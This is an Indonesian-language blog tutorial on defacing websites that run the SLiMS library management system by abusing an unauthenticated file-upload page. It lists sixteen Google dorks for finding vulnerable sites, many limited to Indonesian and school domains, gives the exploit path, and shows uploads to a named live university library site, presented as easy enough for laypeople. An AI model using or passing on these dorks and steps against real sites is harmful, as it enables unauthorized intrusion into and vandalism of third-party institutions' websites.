Assalamualaikum, salam bagi semua pengunjung web ini
Selamat pagi/siang/sore/malam
Jum'at 15 Juli 2022
author : Indra Dwi A / Xnuvers007
==============================================
kali ini saya akan memberikan tutorial deface paling ez :V
sumpah ini ez banget, bahkan orang awam pun bisa
oke, nama teknik deface ini adalah "Deface cms SLiMS"
Software Download Link =
1. https://slims.web.id/web/
2. https://github.com/slims
3. https://go.slims.id/
link diatas adalah download untuk cms SLiMS senayan (jangan dipake karena vuln)
apasih File Attachment upload itu ? yap , kerentanan ini adalah dimana seorang attacker / hacker dapat bebas mengupload file sesuai keinginan si Hacker, entah berupa txt, jpg, php, atau html. tanpa adanya perizinan admin / login, dan si hacker dapat masuk melalui bruteforce directory, seperti menebak directory mana yang ada / memiliki status 200 ok dan setelah ketemu, dicari kerentanan dan coba untuk upload file.
untuk deface ini, kita hanya diizinkan file dengan ekstensi : txt, gif, png, jpg.
dah tidak usah basa basi, mari kita eksekusi
time to execute
======================================
persiapan :
1. Brainware
2. Hardware
3. Software
4. Internet
5. Dorking
6. File
Tested On = KaliLinux, android, windows 10
Exploit Risk = High
Dorking :
#Google Dork 1 : intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''
#Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id
#Google Dork 3 : inurl:''/slims5-meranti/'' site:id
#Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''
#Google Dork 5 : Powered by SLiMS site:id
#Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii
#Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan.
#Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog.
#Google Dork 9 : SLiMS (Senayan Library Management System) is an open source Library Management System.
It is build on Open source technology like PHP and MySQL.
#Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly
This software and this template are released Under GNU GPL License Version 3
#Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id
#Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog
#Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library.
#Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue)
#Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id
#Google Dork 16 : Senayan | Open Source Library Management System :: OPAC
=================================
penggunaan dorking =
https://google.com/search?q=Powered+By+SLiMS+site:id
Execute:
1. Siapkan target dari dorking, saya sudah menemukan live target yaitu https://lib-jkt.sbm.itb.ac.id
2. silahkan masukan exploitnya ini admin/modules/bibliography/pop_attach.php
https://lib-jkt.sbm.itb.ac.id/admin/modules/bibliography/pop_attach.php
3. jika Tampilannya sudah seperti diatas, kita isi yang wajib (yang wajib yang dikasih *) dan setelah itu kita masukan file txt atau png
ini gambar
ini text
4. Setelah itu kita liat di /repository/(namafilekamu)
https://lib-jkt.sbm.itb.ac.id/repository/testgan.txt
https://lib-jkt.sbm.itb.ac.id/repository/Kanao.jpg
Ini Gambar
Ini Text
Donate : https://saweria.co/xnuvers007
Semoga bermanfaat tutorial ini, dan mengembangkan keamanan website indonesia